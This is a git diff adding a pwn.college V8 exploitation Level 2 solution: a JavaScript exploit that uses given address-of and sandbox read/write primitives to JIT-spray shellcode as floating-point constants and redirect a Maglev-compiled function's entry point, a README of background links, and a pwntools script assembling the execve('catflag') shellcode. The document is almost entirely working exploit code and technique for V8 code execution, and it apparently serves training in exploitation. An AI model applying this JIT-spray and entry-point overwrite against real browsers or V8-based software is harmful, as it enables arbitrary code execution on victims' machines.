Level 2 of PwnCollegeV8Exploitation

JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js

@@ -0,0 +1,45 @@
+// Integrated Builtin:
+// - int32 GetAddressOf(obj);
+// - int32 ArbRead32(int32 cage_addr);
+// - void ArbWrite32(int32 cage_addr, int32 value);
+
+// To execute shellcode, we need JIT spray instead of writing RWX segment.
+// Because we cannot write in the 64-bit address space.
+
+// RWXAddr: Function -> code(+0xC) -> instruction_start(+0x14)
+// JIT Spray Double Constant Offset: RWXAddr + 0x6B
+
+function shellcode() {
+    // JIT spray machine code form of `execve("catflag", NULL, NULL)`
+    return [
+        1.9995716422075807e-246,
+        1.9710255944286777e-246,
+        1.97118242283721e-246,
+        1.971136949489835e-246,
+        1.9711826272869888e-246,
+        1.9711829003383248e-246,
+        -9.254983612527998e+61
+    ];
+}
+for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+
+function unptr(v) {
+    return v & 0xfffffffe;
+}
+
+function ptr(v) {
+    return v | 1;
+}
+
+let shellcode_addr = GetAddressOf(shellcode);
+console.log("Address of shellcode: " + shellcode_addr.toString(16));
+let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
+console.log("Address of code: " + code_addr.toString(16));
+let instruction_start_addr = code_addr + 0x14;
+let instruction_start = ArbRead32(instruction_start_addr);
+console.log("instruction_start: " + instruction_start.toString(16));
+ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
+shellcode();
+
+// %DebugPrint(shellcode);
+// %SystemBreak();

JavaScript/PwnCollegeV8Exploitation/Level2/README.md

@@ -0,0 +1,20 @@
+# Level 2
+
+## Problem
+
+Given the following primitves:
+- AddressOf
+- Arbitrary Read & Write in Sandbox
+
+## Key Knowledge
+
+- [Pointer Compression in V8](https://v8.dev/blog/pointer-compression)
+- V8 Optimization Tiers
+    - [Intepreter Ignition](https://v8.dev/blog/sparkplug)
+    - [Non-optimizing JavaScript compiler Sparkplug](https://v8.dev/blog/sparkplug)
+    - [Mid-tier optimizing compiler Maglev](https://v8.dev/blog/maglev)
+    - Top-tier optimizing compiler [Turbofan](https://v8.dev/docs/turbofan) / [Turboshaft](https://v8.dev/blog/holiday-season-2023)
+- [V8 Native Syntaxs](https://v8.dev/docs/builtin-functions)
+    - [V8引擎漏洞分析环境与调试方法基础](https://gtoad.github.io/2019/07/25/V8-Debug/)
+- [JIT Spray in V8](https://www.matteomalvica.com/blog/2024/06/05/intro-v8-exploitation-maglev/#jit-spraying-shellcode)
+- [Shellcraft of Pwntools](https://docs.pwntools.com/en/stable/shellcraft/amd64.html)

JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py

@@ -0,0 +1,46 @@
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+# execve("catflag", NULL, NULL)
+
+assembly = f"""
+/* Craft envp to rdx */
+xor     rdx, rdx            /* 3 */
+/* Craft argv to rsi */
+xor     rsi, rsi            /* 3 */
+jmp     (. + 0x2) + 0xc     /* 2 */
+/* Craft pathname to rdi */
+mov     eax, 0x0067616c     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+shl     rax, 32             /* 4 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     ebx, 0x66746163     /* 5 */
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+or      rax, rbx            /* 3 */
+push    rax                 /* 1 */
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+mov     rdi, rsp            /* 3 */
+nop
+nop
+nop
+jmp     (. + 0x2) + 0xc     /* 2 */
+
+/* syscall execve */
+{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")}         /* 5 */
+int3                        /* 1 */
+int3                        /* 1 */
+int3                        /* 1 */
+""".strip()
+
+dump_machine_code(assembly)